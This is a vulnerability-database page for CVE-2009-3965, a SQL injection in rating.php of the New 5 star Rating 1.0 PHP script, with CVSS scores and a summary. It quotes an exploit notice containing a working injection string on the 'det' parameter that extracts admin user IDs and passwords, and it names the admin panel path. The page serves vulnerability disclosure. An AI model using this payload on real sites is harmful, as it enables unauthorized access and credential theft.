7.5
CVSSv2

CVE-2009-3965

Published: 18/11/2009 Updated: 19/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in rating.php in New 5 star Rating 1.0 allows remote malicious users to execute arbitrary SQL commands via the det parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

maniacomputer new5starrating 1.0

Exploits

New5starRating v10 (ratingphp) Sql Inj Vuln ################## Yazar: Bgh7 Turk Bilisim Gucleri ################## Download; wwwmaniacomputercom/5star_rating/New_5Starhtml Bug-->Sql Inj ################## Exp: ratingphp?det=-1 union select userid,0,0,userpass from admin Panel: /admin/ ################## Thanks: milw0rm-->Str0k ...